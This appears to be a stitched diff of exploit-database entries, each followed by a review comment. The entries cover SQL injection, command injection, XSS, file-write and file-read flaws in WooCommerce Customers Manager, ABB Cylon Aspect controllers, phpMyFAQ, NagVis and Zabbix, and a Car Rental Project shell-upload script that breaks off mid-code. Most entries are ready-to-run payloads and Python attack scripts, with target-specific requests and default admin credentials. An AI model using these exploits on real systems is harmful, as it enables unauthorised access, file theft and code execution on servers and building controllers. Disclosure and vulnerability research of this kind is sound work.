2021-07-12: Updated Plugin has been tested on an up-to-date CraftCMS installation
(CraftCMS 3.7.0, PHP 8, MySQL 8, Logs Plugin 3.0.4)
2022-01-24: Release of security advisory
Solution:
---------
The vendor released a patched version 3.0.4 or higher which can be retrieved from their
website/github:
https://plugins.craftcms.com/logs
https://github.com/ethercreative/logs/commit/eb225cc78b1123a10ce2784790f232d71c2066c4
Workaround:
-----------
Uninstall/Disable the plugin and access the Craft CMS logs via SSH or other services.
Advisory URL:
-------------
https://sec-consult.com/vulnerability-lab/
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
SEC Consult Vulnerability Lab
SEC Consult, an Atos company
Europe | Asia | North America
About SEC Consult Vulnerability Lab
The SEC Consult Vulnerability Lab is an integrated part of SEC Consult, an
Atos company. It ensures the continued knowledge gain of SEC Consult in the
field of network and application security to stay ahead of the attacker. The
SEC Consult Vulnerability Lab supports high-quality penetration testing and
the evaluation of new offensive and defensive technologies for our customers.
Hence our customers obtain the most current information about vulnerabilities
and valid recommendation about the risk profile of new technologies.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Interested to work with the experts of SEC Consult?
Send us your application https://sec-consult.com/career/
Interested in improving your cyber security with the experts of SEC Consult?
Contact our local offices https://sec-consult.com/contact/
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Mail: research at sec-consult dot com
Web: https://www.sec-consult.com
Blog: http://blog.sec-consult.com
Twitter: https://twitter.com/sec_consult
EOF Steffen Rogge / @2022
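Review bot: the `# Date: 2022.01.26` header disagrees with the timeline entry "2022-01-24: Release of security advisory"; one of the two should be corrected. The Solution section links the fix commit but does not say what it changes; a sentence stating whether the patch canonicalizes the `log` parameter and rejects any path outside `@storage/logs` (the check absent from the quoted `actionStream()`) would let readers verify the mitigation on their own installs rather than trust the version number. The Workaround could also mention that the endpoint is admin-only, so restricting who holds admin accounts and monitoring the access log for `logs/logs/stream?log=` requests containing `..` is a usable detection until the plugin is updated.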

@ -0,0 +1,91 @@
# Exploit Title: WooCommerce Customers Manager 29.4 - Post-Authenticated SQL Injection
# Date: 2024-03-25
# Exploit Author: Ivan Spiridonov - xbz0n
# Software Link: https://codecanyon.net/item/woocommerce-customers-manager/10965432
# Version: 29.4
# Tested on: Ubuntu 22.04
# CVE: CVE-2024-0399
## SQL Injection
The plugin does not properly sanitise and escape a parameter before using it in a SQL statement, leading to an SQL injection exploitable by Subscriber+ role.
## Affected Components
- **Plugin:** WooCommerce Customers Manager
- **Version:** 29.4
- **Affected Parameters:** 'max_amount', 'max_amount_total', 'min_amount', 'min_amount_total'
- **Affected Endpoint:** /wp-admin/admin-ajax.php
## Description
The vulnerability is located within the transaction amount parameters like 'max_amount', 'max_amount_total', 'min_amount', and 'min_amount_total' used in the admin AJAX endpoint. By injecting SQL commands into these parameters, authenticated attackers can manipulate SQL queries leading to a time-based SQL Injection vulnerability.
## Proof of Concept
### Manual Exploitation
```http
POST /wp-admin/admin-ajax.php HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:121.0) Gecko/20100101 Firefox/121.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Referer: http://localhost/wp-admin/admin.php?page=wccm-discover-customer
X-Requested-With: XMLHttpRequest
Content-Type: multipart/form-data; boundary=---------------------------2461714219322283440478088295
Content-Length: 1877
Origin: http://localhost
Connection: close
Cookie: Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
-----------------------------2461714219322283440478088295
Content-Disposition: form-data; name="action"
wccm_get_orders_tot_num
-----------------------------2461714219322283440478088295
Content-Disposition: form-data; name="start_date"
2024-01-09
-----------------------------2461714219322283440478088295
Content-Disposition: form-data; name="end_date"
2024-01-11
-----------------------------2461714219322283440478088295
Content-Disposition: form-data; name="customer_ids"
-----------------------------2461714219322283440478088295
Content-Disposition: form-data; name="product_ids"
-----------------------------2461714219322283440478088295
Content-Disposition: form-data; name="category_ids"
-----------------------------2461714219322283440478088295
Content-Disposition: form-data; name="min_amount"
0
-----------------------------2461714219322283440478088295
Content-Disposition: form-data; name="max_amount"
0
-----------------------------2461714219322283440478088295
Content-Disposition: form-data; name="min_amount_total"
0
-----------------------------2461714219322283440478088295
Content-Disposition: form-data; name="max_amount_total"
(select*from(select(sleep(20)))a)
-----------------------------2461714219322283440478088295
Content-Disposition: form-data; name="product_relationship"
or
-----------------------------2461714219322283440478088295
Content-Disposition: form-data; name="product_category_relationship"
or
-----------------------------2461714219322283440478088295
Content-Disposition: form-data; name="product_category_filters_relationship"
and
-----------------------------2461714219322283440478088295
Content-Disposition: form-data; name="statuses"
wc-pending,wc-processing,wc-on-hold,wc-completed,wc-cancelled,wc-refunded,wc-failed,wc-checkout-draft
-----------------------------2461714219322283440478088295--
```
If the server response is delayed by approximately 20 seconds, it indicates a successful exploitation of the time-based SQL Injection, confirming the vulnerability.
## Recommendations
Users of WooCommerce Customers Manager v29.4 are strongly advised to restrict access to the affected endpoint and update the plugin as soon as a fixed version is released. This advisory serves as a notice to all users of Smart Manager v8.27.0 to take immediate action in updating their plugin to protect against this SQL Injection vulnerability.
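Review bot: the Recommendations paragraph ends with "all users of Smart Manager v8.27.0", a different plugin; this is a copy-paste error and should name WooCommerce Customers Manager 29.4. In the request, the line `Cookie: Sec-Fetch-Dest: empty` has the cookie value redacted in a way that fused the next header onto the same line; split it into `Cookie: <redacted>` and `Sec-Fetch-Dest: empty` so the request is a syntactically valid HTTP message. The description says the four amount parameters are neither sanitised nor escaped, so the fix readers should look for in a patched release is a prepared statement (`$wpdb->prepare()`) or a numeric cast on those parameters, plus capability and nonce checks on the `wccm_get_orders_tot_num` AJAX action; stating that would make the advisory actionable for site owners.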

@ -0,0 +1,79 @@
# Exploit title : ABB Cylon Aspect 4.00.00 (factorySetSerialNum.php) Remote Code Execution
# Vendor: ABB Ltd.
# Product web page: https://www.global.abb
# Affected version: NEXUS Series, MATRIX-2 Series, ASPECT-Enterprise, ASPECT-Studio
Firmware: <=4.00.00
Summary: ASPECT is an award-winning scalable building energy management
and control solution designed to allow users seamless access to their
building data through standard building protocols including smart devices.
Desc: The ABB Cylon Aspect BMS/BAS controller suffers from an unauthenticated
blind command injection vulnerability. Input passed to the serial and ManufactureDate
POST parameters is not properly sanitized, allowing attackers to execute arbitrary
shell commands on the system. While factory test scripts included in the upgrade
bundle are typically deleted, a short window for exploitation exists when the device
is in the manufacturing phase.
Tested on: GNU/Linux 3.15.10 (armv7l)
GNU/Linux 3.10.0 (x86_64)
GNU/Linux 2.6.32 (x86_64)
Intel(R) Atom(TM) Processor E3930 @ 1.30GHz
Intel(R) Xeon(R) Silver 4208 CPU @ 2.10GHz
PHP/7.3.11
PHP/5.6.30
PHP/5.4.16
PHP/4.4.8
PHP/5.3.3
AspectFT Automation Application Server
lighttpd/1.4.32
lighttpd/1.4.18
Apache/2.2.15 (CentOS)
OpenJDK Runtime Environment (rhel-2.6.22.1.-x86_64)
OpenJDK 64-Bit Server VM (build 24.261-b02, mixed mode)
ErgoTech MIX Deployment Server 2.0.0
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2025-5894
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2025-5894.php
21.04.2024
--
$ cat project
P R O J E C T
.|
| |
|'| ._____
___ | | |. |' .---"|
_ .-' '-. | | .--'| || | _| |
.-'| _.| | || '-__ | | | || |
|' | |. | || | | | | || |
____| '-' ' "" '-' '-.' '` |____
░▒▓███████▓▒░░▒▓███████▓▒░ ░▒▓██████▓▒░░▒▓█▓▒░▒▓███████▓▒░
░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
░▒▓███████▓▒░░▒▓███████▓▒░░▒▓████████▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
░▒▓███████▓▒░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
░▒▓████████▓▒░▒▓██████▓▒░ ░▒▓██████▓▒░
░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░░░░░░
░▒▓██████▓▒░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒▒▓███▓▒░
░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
░▒▓█▓▒░░░░░░░░▒▓██████▓▒░ ░▒▓██████▓▒░
$ curl http://192.168.73.31/factorySetSerialNum.php \
> -d "serial=;sleep 2&ManufactureDate=;sleep 3"
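Review bot: the `21.04.2024` date conflicts with the advisory ID `ZSL-2025-5894`, which is a 2025 identifier; one of them is wrong. The header is also inconsistent with the rest of this commit: only the first four lines carry the `#` prefix, while `Firmware:`, `Summary:`, `Desc:` and `Tested on:` are bare text, and there is no `# Date:` or `# CVE :` field. The PoC on the last two lines injects `sleep` into both `serial` and `ManufactureDate`; a sentence stating that the observable signal is the added response delay, and that the fix is to remove the factory test scripts from shipped firmware and validate both parameters, would let a reader verify and remediate without guessing.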

@ -0,0 +1,79 @@
# Exploit title: ABB Cylon Aspect 4.00.00 (factorySaved.php) Unauthenticated XSS
# Vendor: ABB Ltd.
# Product web page: https://www.global.abb
# Affected version: NEXUS Series, MATRIX-2 Series, ASPECT-Enterprise, ASPECT-Studio
Firmware: <=4.00.00
Summary: ASPECT is an award-winning scalable building energy management
and control solution designed to allow users seamless access to their
building data through standard building protocols including smart devices.
Desc: The ABB Cylon Aspect BMS/BAS controller suffers from an unauthenticated
reflected cross-site scripting vulnerability in the 'title' GET parameter.
Input is not properly sanitized before being returned to the user, allowing
the execution of arbitrary HTML/JS code in a user's browser session in the
context of the affected site. While the factory test scripts included in the
upgrade bundle are typically deleted, a short window for exploitation exists
when the device is in the manufacturing phase.
Tested on: GNU/Linux 3.15.10 (armv7l)
GNU/Linux 3.10.0 (x86_64)
GNU/Linux 2.6.32 (x86_64)
Intel(R) Atom(TM) Processor E3930 @ 1.30GHz
Intel(R) Xeon(R) Silver 4208 CPU @ 2.10GHz
PHP/7.3.11
PHP/5.6.30
PHP/5.4.16
PHP/4.4.8
PHP/5.3.3
AspectFT Automation Application Server
lighttpd/1.4.32
lighttpd/1.4.18
Apache/2.2.15 (CentOS)
OpenJDK Runtime Environment (rhel-2.6.22.1.-x86_64)
OpenJDK 64-Bit Server VM (build 24.261-b02, mixed mode)
ErgoTech MIX Deployment Server 2.0.0
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2025-5893
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2025-5893.php
21.04.2024
--
$ cat project
P R O J E C T
.|
| |
|'| ._____
___ | | |. |' .---"|
_ .-' '-. | | .--'| || | _| |
.-'| _.| | || '-__ | | | || |
|' | |. | || | | | | || |
____| '-' ' "" '-' '-.' '` |____
░▒▓███████▓▒░░▒▓███████▓▒░ ░▒▓██████▓▒░░▒▓█▓▒░▒▓███████▓▒░
░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
░▒▓███████▓▒░░▒▓███████▓▒░░▒▓████████▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
░▒▓███████▓▒░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
░▒▓████████▓▒░▒▓██████▓▒░ ░▒▓██████▓▒░
░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░░░░░░
░▒▓██████▓▒░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒▒▓███▓▒░
░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
░▒▓█▓▒░░░░░░░░▒▓██████▓▒░ ░▒▓██████▓▒░
$ http://192.168.73.31/factorySaved.php?title=<script>console.log('ZSL')</script>
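Review bot: the final line `$ http://192.168.73.31/factorySaved.php?title=...` is a bare URL behind a shell prompt, which is not a runnable command; drop the prompt or show the `curl` form used by the sibling ABB entries. As in those entries, only the first four header lines use the `#` prefix, and the `21.04.2024` date conflicts with the 2025 advisory ID `ZSL-2025-5893`. The description should name the fix: HTML-encode `title` before it is reflected, and remove the factory test scripts from production images.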

@ -0,0 +1,83 @@
# Exploit title: ABB Cylon Aspect 3.08.03 (webServerDeviceLabelUpdate.php) File Write DoS
# Vendor: ABB Ltd.
# Product web page: https://www.global.abb
# Affected version: NEXUS Series, MATRIX-2 Series, ASPECT-Enterprise, ASPECT-Studio
Firmware: <=3.08.03
Summary: ASPECT is an award-winning scalable building energy management
and control solution designed to allow users seamless access to their
building data through standard building protocols including smart devices.
Desc: The ABB Cylon Aspect BMS/BAS controller suffers from an authenticated
arbitrary content injection vulnerability in the webServerDeviceLabelUpdate.php
script due to a lack of input validation. Authenticated attackers can exploit
the 'deviceLabel' POST parameter to write arbitrary content to a fixed file
location at /usr/local/aam/etc/deviceLabel, potentially causing a denial of
service.
Tested on: GNU/Linux 3.15.10 (armv7l)
GNU/Linux 3.10.0 (x86_64)
GNU/Linux 2.6.32 (x86_64)
Intel(R) Atom(TM) Processor E3930 @ 1.30GHz
Intel(R) Xeon(R) Silver 4208 CPU @ 2.10GHz
PHP/7.3.11
PHP/5.6.30
PHP/5.4.16
PHP/4.4.8
PHP/5.3.3
AspectFT Automation Application Server
lighttpd/1.4.32
lighttpd/1.4.18
Apache/2.2.15 (CentOS)
OpenJDK Runtime Environment (rhel-2.6.22.1.-x86_64)
OpenJDK 64-Bit Server VM (build 24.261-b02, mixed mode)
ErgoTech MIX Deployment Server 2.0.0
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2025-5892
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2025-5892.php
21.04.2024
--
$ cat project
P R O J E C T
.|
| |
|'| ._____
___ | | |. |' .---"|
_ .-' '-. | | .--'| || | _| |
.-'| _.| | || '-__ | | | || |
|' | |. | || | | | | || |
____| '-' ' "" '-' '-.' '` |____
░▒▓███████▓▒░░▒▓███████▓▒░ ░▒▓██████▓▒░░▒▓█▓▒░▒▓███████▓▒░
░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
░▒▓███████▓▒░░▒▓███████▓▒░░▒▓████████▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
░▒▓███████▓▒░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
░▒▓████████▓▒░▒▓██████▓▒░ ░▒▓██████▓▒░
░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░░░░░░
░▒▓██████▓▒░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒▒▓███▓▒░
░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
░▒▓█▓▒░░░░░░░░▒▓██████▓▒░ ░▒▓██████▓▒░
$ curl http://192.168.73.31/webServerDeviceLabelUpdate.php \
> -H "Cookie: PHPSESSID=xxx" \
> -d "deviceLabel=`printf '%.0sA' {1..10000}`"\
> # --data-urlencode "deviceLabel@largecontent.txt"
$ curl http://192.168.73.31/webServerConfiguration.php | grep AAA
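Review bot: the trailing `\` on the `-d "deviceLabel=..."` line continues the command into the next line, so `# --data-urlencode "deviceLabel@largecontent.txt"` is not a comment: the `#` is attached directly to the closing quote and becomes part of the same argument, and `--data-urlencode` is then passed to curl as a second option. Remove the backslash or move the alternative onto its own line. `{1..10000}` is a bash brace expansion and will not work in POSIX `sh`. The `21.04.2024` date again conflicts with the 2025 advisory ID `ZSL-2025-5892`, and the description would benefit from the remediation: a length limit and character allow-list on `deviceLabel` before it is written to `/usr/local/aam/etc/deviceLabel`.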

@ -0,0 +1,28 @@
# Exploit Title: phpMyFAQ 3.1.7 - Reflected Cross-Site Scripting (XSS)
# Date: 2024-10-26
# Exploit Author: CodeSecLab
# Vendor Homepage: https://github.com/thorsten/phpMyFAQ
# Software Link: https://github.com/thorsten/phpMyFAQ
# Version: 3.1.7
# Tested on: Ubuntu Windows
# CVE : CVE-2022-4407
PoC:
Get: http://127.0.0.1/phpmyfaq/admin/index.php?action=\"><script>alert('XSS')</script>
Details:
{
"Sink": "phpmyfaq/admin/header.php - HTML attribute in the form action parameter",
"Vulnerable Variable": "action",
"Source": "phpmyfaq/admin/index.php - Filter::filterInput(INPUT_GET, 'action', FILTER_UNSAFE_RAW)",
"Sanitization Mechanisms Before Patch": "None - Input directly used without escaping or encoding in the HTML attribute",
"Sink Context Constraints": "HTML attribute context - needs proper escaping to break out of attribute",
"Attack Payload": "\"><script>alert('XSS')</script>",
"Execution Path Constraints": "The 'action' parameter must be passed via GET or POST without prior sanitization or if it is null, it must be taken from 'redirect-action' parameter unless it equals 'logout'",
"Request Parameters": "action",
"Request URL": "http://127.0.0.1/phpmyfaq/admin/index.php?action=\"><script>alert('XSS')</script>",
"Request Method": "GET",
"Final PoC": "http://127.0.0.1/phpmyfaq/admin/index.php?action=\"><script>alert('XSS')</script>"
}
[Replace Your Domain Name]
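Review bot: the `Get:` line keeps the JSON escape `\"` from the Details block, but in a URL the backslash is a literal character, and the Details `Attack Payload` entry gives the payload as `"><script>...` without it, so the two disagree; unescape the URL (or percent-encode the quote). `# Tested on: Ubuntu Windows` needs a separator, and the trailing `[Replace Your Domain Name]` is a loose note that belongs next to the `127.0.0.1` placeholder it refers to. The Details block already identifies the defect (`FILTER_UNSAFE_RAW` on `action` with no attribute-context escaping), so stating the fix, escaping the value for the HTML attribute context in `admin/header.php`, is a one-liner.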

exploits/php/webapps/52229.py Executable file
@ -0,0 +1,74 @@
# Exploit Title: NagVis 1.9.33 - Arbitrary File Read
# Date: 03/12/2024
# Exploit Author: David Rodríguez a.k.a. xerosec
# Vendor Homepage: https://www.nagvis.org/
# Software Link: https://www.nagvis.org/downloads/archive
# Version: 1.9.33
# Tested on: Linux
# CVE: CVE-2022-46945
import requests
import argparse
import json
from urllib.parse import urljoin
def authenticate(target_url, username, password):
url = urljoin(target_url, '/nagvis/frontend/nagvis-js/index.php')
headers = {"User-Agent": "Mozilla/5.0", "Content-Type": "application/x-www-form-urlencoded"}
data = {"_username": username, "_password": password, "submit": "Login"}
try:
response = requests.post(url, headers=headers, data=data)
if response.status_code == 200 and "Set-Cookie" in response.headers:
print("[✔] Authentication successful.")
return response.headers["Set-Cookie"]
print(f"[✘] Authentication failed. Status code: {response.status_code}")
except Exception as e:
print(f"[✘] Request error: {e}")
return None
def exploit(target_url, session_cookie, file_path):
url = urljoin(target_url, '/nagvis/server/core/ajax_handler.php')
headers = {"User-Agent": "Mozilla/5.0", "Cookie": session_cookie}
params = {"mod": "General", "act": "getHoverUrl", "url[]": f"file://{file_path}"}
try:
response = requests.get(url, headers=headers, params=params)
if response.status_code == 200:
print("[✔] Exploitation successful. File content:\n")
display_file_content(response.text)
else:
print(f"[✘] Exploitation failed. Status code: {response.status_code}")
except Exception as e:
print(f"[✘] Request error: {e}")
def display_file_content(raw_response):
try:
data = json.loads(raw_response)
if isinstance(data, list) and len(data) > 0 and isinstance(data[0], dict) and "code" in data[0]:
content = data[0]["code"]
# Decodificar escapes de manera segura
content = content.encode('utf-8').decode('unicode_escape')
print(content.strip())
else:
print("[✘] Unexpected JSON structure.")
except json.JSONDecodeError as jde:
print(f"[✘] JSON decoding error: {jde}")
except Exception as e:
print(f"[✘] Unexpected error during output processing: {e}")
def main():
parser = argparse.ArgumentParser(description="Exploit for CVE-2022-46945 (File Read Vulnerability)")
parser.add_argument("-t", "--target", required=True, help="Target base URL (e.g., http://10.0.2.132)")
parser.add_argument("-u", "--username", required=True, help="Username for authentication")
parser.add_argument("-p", "--password", required=True, help="Password for authentication")
parser.add_argument("-f", "--file", required=True, help="File path to read (e.g., /etc/passwd)")
args = parser.parse_args()
session_cookie = authenticate(args.target, args.username, args.password)
if session_cookie:
exploit(args.target, session_cookie, args.file)
if __name__ == "__main__":
main()
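Review bot: `authenticate()` reports success whenever the login response is 200 and carries a `Set-Cookie` header, but a PHP session cookie is set on the login page regardless of whether the credentials were accepted, so a wrong password still prints `[✔] Authentication successful.` and the script continues with an unauthenticated session; check the body or the post-login redirect instead. In `display_file_content()`, `content.encode('utf-8').decode('unicode_escape')` decodes the bytes as Latin-1 and will corrupt any non-ASCII text in the fetched file; `json.loads` has already resolved the JSON escapes, so that line can be dropped. The comment above it, `Decodificar escapes de manera segura`, is in Spanish and should be English like the rest of the file. Neither request sets a timeout.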

exploits/php/webapps/52230.py Executable file
@ -0,0 +1,63 @@
# Exploit Title: Zabbix 7.0.0 - SQL Injection
# Date: 06/12/2024
# Exploit Author: Leandro Dias Barata @m4nb4
# Vendor Homepage: https://www.zabbix.com/
# Software Link: https://support.zabbix.com/browse/ZBX-25623
# Version: 6.0.0 - 6.0.31 / 6.0.32rc1 6.4.0 - 6.4.16 / 6.4.17rc1 7.0.0
# Tested on: Kali Linux kali-linux-2024.3
# CVE: CVE-2024-42327
import requests
import argparse
HEADERS = {"Content-Type": "application/json"}
def main():
parser = argparse.ArgumentParser(description="CHECK for CVE-2024-42327")
parser.add_argument("-t", "--target", required=True, help="API URL")
parser.add_argument("-u", "--username", required=True, help="Username")
parser.add_argument("-p", "--password", required=True, help="Password")
args = parser.parse_args()
url = f"{args.target.rstrip('/')}/api_jsonrpc.php"
# Login to get the token
login_data = {
"jsonrpc": "2.0",
"method": "user.login",
"params": {"username": args.username, "password": args.password},
"id": 1,
"auth": None
}
try:
login_response = requests.post(url, json=login_data, headers=HEADERS)
login_response.raise_for_status()
auth_token = login_response.json().get("result")
# Simple SQLi test
data = {
"jsonrpc": "2.0",
"method": "user.get",
"params": {
"selectRole": ["roleid", "name", "type", "readonly AND (SELECT(SLEEP(5)))"],
"userids": ["1", "2"]
},
"id": 1,
"auth": auth_token
}
test_response = requests.post(url, json=data, headers=HEADERS)
test_response.raise_for_status()
if "error" in test_response.text:
print("[-] NOT VULNERABLE.")
else:
print("[!] VULNERABLE.")
except requests.RequestException as e:
print(f"[!] Request error: {e}")
if __name__ == "__main__":
main()
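Review bot: the verdict in `main()` is decided by whether the string `error` appears in the response body, not by the delay the injected `SLEEP(5)` would cause, so an unaffected target that answers normally is printed as `[!] VULNERABLE.` and any reply that merely contains the word `error` is printed as not vulnerable. Compare `test_response.elapsed` against a baseline request and decide on the delay. `login_response.json().get("result")` is `None` when the login fails (Zabbix returns the problem under `error`), and the script then sends `"auth": None` with the test request instead of stopping. The `# Version:` line lists several ranges with no separators, and `# Tested on: Kali Linux kali-linux-2024.3` repeats itself.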

@ -0,0 +1,45 @@
# Exploit Title: phpMyFAQ v3.2.10 - Unintended File Download Triggered by Embedded Frames
# Date: 13 Dec 2024
# Exploit Author: George Chen
# Vendor Homepage: https://github.com/thorsten/phpMyFAQ/
# Software Link: https://github.com/thorsten/phpMyFAQ/
# Version: v3.2.10
# Tested on: Mac, Win
# CVE : CVE-202455889
*Summary*
A vulnerability exists in the FAQ Record component of
https://github.com/thorsten/phpMyFAQ v3.2.10 where a privileged attacker
can trigger a file download on a victims machine upon page visit by
embedding it in an <iframe> element without user interaction or explicit
consent.
*Details*
In http://localhost/admin/index.php?action=editentry&id=20&lang=en, where a
FAQ record is either created or edited, an attacker can insert an iframe,
as “source code”, pointing to a prior “malicious” attachment that the
attacker has uploaded via FAQ “new attachment” upload, such that any page
visits to this FAQ will trigger an automated download (from the edit
screen, download is automated; from the faq page view as a normal user,
depending on the browser, a pop up confirmation may be presented before the
actual download. Firebox browser, for instance, does not require any
interactions).
[image: image.png]
*PoC*
1. create a new FAQ record and upload a “malicious” file — in my case, I
uploaded an eicar file. Take note of the uri, ie
“index.php?action=attachment&id=2”
2. in the FAQ record, insert a “source code” blob using the “< >” button
3. insert in the following snippet and save FAQ record:
<p><iframe src="index.php?action=attachment&id=2"></iframe></p> [image:
image.png]
4. Once the edit page reloads, the malicious code will be downloaded
onto the local machine without user interaction:[image: image.png]
Advisory:
https://github.com/thorsten/phpMyFAQ/security/advisories/GHSA-m3r7-8gw7-qwvc
Disclosure: https://geochen.medium.com/cve-2024-55889-03572ae6c35c
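Review bot: the `# CVE :` header reads `CVE-202455889`; the disclosure URL at the bottom spells it `cve-2024-55889`, so a hyphen is missing. The body is pasted from an e-mail and still carries `[image: image.png]` three times and `*bold*` markers; replace the image references with a sentence on what the screenshots showed. `Firebox browser` in the Details paragraph is presumably Firefox. The PoC steps are clear, and using an EICAR test file as the "malicious" attachment keeps the reproduction harmless; what is missing is a line summarising the fix from the linked GHSA advisory (the version that addresses the issue) so readers know what to upgrade to.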

exploits/php/webapps/52243.py Executable file
@ -0,0 +1,91 @@
# Exploit Title: Car Rental Project 1.0 - Remote Code Execution
# Date: 1/3/2020
# Exploit Author: FULLSHADE, SC
# Vendor Homepage: https://phpgurukul.com/
# Software Link: https://phpgurukul.com/car-rental-project-php-mysql-free-download/
# Version: 1.0
# Tested on: Windows
# CVE : CVE-2020-5509
# ==================================================
# Information & description
# ==================================================
# Car Rental Project v.1.0 is vulnerable to arbitrary file upload since an admin can change the image of a product and the file change PHP code doesn't validate or care what type of file is submitted, which leads to an attack having the ability to upload malicious files. This Python POC will execute arbitrary commands on the remote server.
# ==================================================
# Manual POC
# ==================================================
# Manual POC method
# - Visit carrental > admin login > changeimage1.php
# - Upload a php rce vulnerable payload
# - Visit /carrentalproject/carrental/admin/img/vehicleimages/.php to visit your file
# - Execute commands on the server
# ==================================================
# POC automation script
# ==================================================
import sys
import requests
print("""
+-------------------------------------------------------------+
Car Rental Project v1.0 - Remote Code Execution
FULLSHADE, FullPwn Operations
+-------------------------------------------------------------+
""")
def login():
sessionObj = requests.session()
RHOSTS = sys.argv[1]
bigstring = "\n+-------------------------------------------------------------+\n"
print("+-------------------------------------------------------------+")
print("[+] Victim host: {}".format(RHOSTs))
POST_AUTH_LOGIN = "http://" + RHOSTS + "/carrentalproject/carrental/admin/index.php"
SHELL_UPLOAD_URL = "http://" + RHOSTS + "/carrentalproject/carrental/admin/changeimage1.php"
# login / authentication
payload = {"username": "admin", "password": "Test@12345", "login": ""}
login = sessionObj.post(POST_AUTH_LOGIN, data=payload)
# get response
if login.status_code == 200:
print("[+] Login HTTP response code: 200")
print("[+] Successfully logged in")
else:
print("[!] Failed to authenticate")
sys.exit()
# get session token
session_cookie_dic = sessionObj.cookies.get_dict()
